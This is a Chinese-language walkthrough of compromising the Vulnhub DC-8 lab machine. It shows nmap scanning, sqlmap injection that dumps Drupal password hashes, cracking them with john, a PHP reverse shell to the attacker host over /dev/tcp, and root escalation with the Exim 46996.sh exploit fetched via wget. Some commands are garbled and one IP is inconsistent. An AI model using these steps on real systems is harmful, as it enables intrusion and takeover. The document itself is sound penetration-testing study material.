Vulnhub-DC-8 靶机复现完整过程

一、环境搭建

kali的IP地址:192.168.200.14
DC-8的IP地址:192.168.200.13(一个flag)

靶机和攻击机处于同一个网络方式:nat或桥接
若出现开机错误,适当将dc的兼容版本改低,我的vmware workstation是17改成16.x就可以兼容

二、信息收集

1、扫描同网段存活主机

第一种方式:

arp-scan -l

Vulnhub-DC-8 靶机复现完整过程_第1张图片
第二种方式:

netdiscover -r 192.168.200.0/24

Vulnhub-DC-8 靶机复现完整过程_第2张图片

2、开放端口探测

nmap -sV -p-  192.168.200.13 

Vulnhub-DC-8 靶机复现完整过程_第3张图片
开放端口有两个:22(SSH服务默认端口)和80(http默认端口)

3.目录扫描

Vulnhub-DC-8 靶机复现完整过程_第4张图片
Vulnhub-DC-8 靶机复现完整过程_第5张图片
Vulnhub-DC-8 靶机复现完整过程_第6张图片
查看robots。txt文件
Vulnhub-DC-8 靶机复现完整过程_第7张图片
这些禁止爬取的文件基本上都访问不了

三,漏洞探测

访问web页面
Vulnhub-DC-8 靶机复现完整过程_第8张图片
和DC-7一样的CMS(Drupal),DC-7的版本是8的,这个DC-8的版本是7的
不过页面中存在这样的三个不同的URL:
http://192.168.200.13/?nid=1
http://192.168.200.13/?nid=2
http://192.168.200.13/?nid=3
可能存在文件包含和SQL注入的漏洞
Vulnhub-DC-8 靶机复现完整过程_第9张图片

SQLMAP

1、扫描数据库

 sqlmap -u "http://192.168.200.13/?nid=1" --dbs --batch

Vulnhub-DC-8 靶机复现完整过程_第10张图片

2、查询数据表名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db --tables --batch

Vulnhub-DC-8 靶机复现完整过程_第11张图片

3、查询字段名

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users --columns --batch

Vulnhub-DC-8 靶机复现完整过程_第12张图片

4、查询字段值

sqlmap -u "http://192.168.200.13/?nid=1" -D d7db -T users -C name,pass --dump

Vulnhub-DC-8 靶机复现完整过程_第13张图片
账号:admin
密码: S S SD2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

账号:john
密码: S S SDqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

四。漏洞利用

1.爆破密码密文

Drupal的hash密文是经过特殊加密的,用john进行爆破,先保存到password.txt文件中

vim  password.txt

Vulnhub-DC-8 靶机复现完整过程_第14张图片

Vulnhub-DC-8 靶机复现完整过程_第15张图片

爆破出来密文:turtle
试试 能不能直接账号对 DC-8 进行ssh登录,没成功,只能想办法获取webshell了
Vulnhub-DC-8 靶机复现完整过程_第16张图片

2.反弹shell

先用获得的密码:turtle登录,试试登录后台,应该是john的密码
Vulnhub-DC-8 靶机复现完整过程_第17张图片

登录成功!
Vulnhub-DC-8 靶机复现完整过程_第18张图片

还是运用上一靶场的方法,找一找能上传一句话木马的php文件
连不上。然后显示phpinfo的地址死活没反应
直接获取shell

PHP反弹 shell(Post 请求发送命令)

 /dev/tcp/192.168.200.14/8899 0>&1");?>    #交互式shell

/dev/tcp/192.168.200.14/8899 0>&1'");?>  #交互式shell

 

将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,联系随便填入联系表单,点击发送,触发PHP代码
Vulnhub-DC-8 靶机复现完整过程_第19张图片
Vulnhub-DC-8 靶机复现完整过程_第20张图片
成功反弹shell
Vulnhub-DC-8 靶机复现完整过程_第21张图片

3.提权

查一下suid权限的二进制文件

find / -perm -4000 -print 2>/dev/null

Vulnhub-DC-8 靶机复现完整过程_第22张图片
查询Exim 版本为4.89
Vulnhub-DC-8 靶机复现完整过程_第23张图片

利用kali搜索EXP
Vulnhub-DC-8 靶机复现完整过程_第24张图片

不破坏原有结构,复制一份新的命名为shell.sh(到kali端的桌面)

cp /usr/share/exploitdb/exploits/linux/local/46996.sh shell.sh  

开启http服务

python -m http.server 8899

注:交互页面,方便后续操作

python -c 'import pty;pty.spawn("/bin/bash")'

在DC-7中下载该文件

wget  //192.168.200.57:8888/shell.sh

Vulnhub-DC-8 靶机复现完整过程_第25张图片
文件权限是无执行权限的,赋予执行权限

chmod 777 shell.sh

Vulnhub-DC-8 靶机复现完整过程_第26张图片
赋予可执行权限
Vulnhub-DC-8 靶机复现完整过程_第27张图片
接着根据sh脚本提示,执行文件

./shell.sh

不过奇怪的是,执行完之后还是普通权限
Vulnhub-DC-8 靶机复现完整过程_第28张图片
查看脚本的使用规则,又两个参数可用
Vulnhub-DC-8 靶机复现完整过程_第29张图片
将两个规则分别运行,第一个规则在运行之后无效;第二个规则成功运行,等待几秒之后,输入whoami可以看到提权成功
Vulnhub-DC-8 靶机复现完整过程_第30张图片
近到root目录,查看最终flag内容
Vulnhub-DC-8 靶机复现完整过程_第31张图片

文章参考出处:https://blog.csdn.net/weixin_45744814/article/details/120113301

你可能感兴趣的:(#,红队打靶,web安全,学习)